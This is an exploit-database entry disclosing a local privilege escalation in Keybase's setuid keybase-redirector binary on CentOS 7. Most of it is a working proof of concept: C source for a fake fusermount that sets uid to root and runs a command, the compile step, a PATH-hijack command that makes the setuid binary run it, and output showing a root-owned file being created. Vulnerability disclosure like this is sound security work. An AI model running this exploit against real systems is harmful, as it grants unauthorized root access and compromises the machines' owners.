Keybase keybase-redirector – ‘$PATH’ Local Privilege Escalation

• Exploit Database
• 35 阅读

• 作者： mirchr
  日期： 2018-10-22
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/46044/

• keybase-redirector is a setuid root binary. keybase-redirector calls the fusermount binary using a relative path and the application trusts the value of $PATH. This allows a local, unprivileged user to trick the application to executing a custom fusermount binary as root.
  
  ## Environment
  
  CentOS Linux release 7.4.1708 (Core)
  3.10.0-693.17.1.el7.x86_64
  
  RPM info
  
  ```
  Name: keybase
  Version : 2.8.0.20181017144746.3efc4cbf3c
  Release : 1
  Architecture: x86_64
  Install Date: Mon 22 Oct 2018 05:30:36 PM EDT
  Group : Unspecified
  Size: 273302678
  License : BSD
  Signature : RSA/SHA256, Wed 17 Oct 2018 10:55:21 AM EDT, Key ID 47484e50656d16c7
  Source RPM: keybase-2.8.0.20181017144746.3efc4cbf3c-1.src.rpm
  Build Date: Wed 17 Oct 2018 10:54:47 AM EDT
  Build Host: 6ae61e160e87
  Relocations : (not relocatable)
  Summary : Keybase command line client
  Description :
  Keybase command line client
  ```
  
  An unprivileged user named user1 is used for this PoC.
  
  ## Steps to reproduce
  
  1) Display privileges of user 1 - execute the id command
  
  ```
  [user1@localhost woot]$ id
  uid=1000(user1) gid=1000(user1) groups=1000(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
  ```
  
  2) Create a custom fusermount application. This PoC will create /w00t as root. Arbitrary commands can be executed.
  
  ```
  cat >fusermount.c<<EOF
  #include <stdio.h>
  #include <stdlib.h>
  #include <sys/types.h>
  #include <unistd.h>
  
  int main(int argc, char **argv)
  {
  setreuid(0,0);
  system("/usr/bin/touch /w00t");
  return(0);
  }
  EOF
  ``
  
  3) Compile fusermount.c
  
  ```
  gcc -Wall fusermount.c -o fusermount
  ```
  
  4) Verify that /w00t does not exist.
  
  ```
  [user1@localhost woot]$ ls -ld /w00t
  ls: cannot access /w00t: No such file or directory
  ```
  
  5) Prepend the PATH environment variable with a dot(for current working directory) and execute keybase-redirector which in turn will execute the malicious fusermount binary as root.
  
  ```
  env PATH=.:$PATH /usr/bin/keybase-redirector /keybase
  ```
  
  6) Enter the control-c sequence to kill the application.
  
  ```
  [user1@localhost woot]$ env PATH=.:$PATH /usr/bin/keybase-redirector /keybase
  ^C
  ```
  
  7) Verify that /w00t exists
  
  ```
  [user1@localhost woot]$ ls -ld /w00t
  -rw-rw-r--. 1 root user1 0 Oct 22 16:34 /w00t
  [user1@localhost woot]$
  ```
  
  ## Impact
  
  Unauthorized root access is possible which impacts the confidentially, integrity, and availability of the system.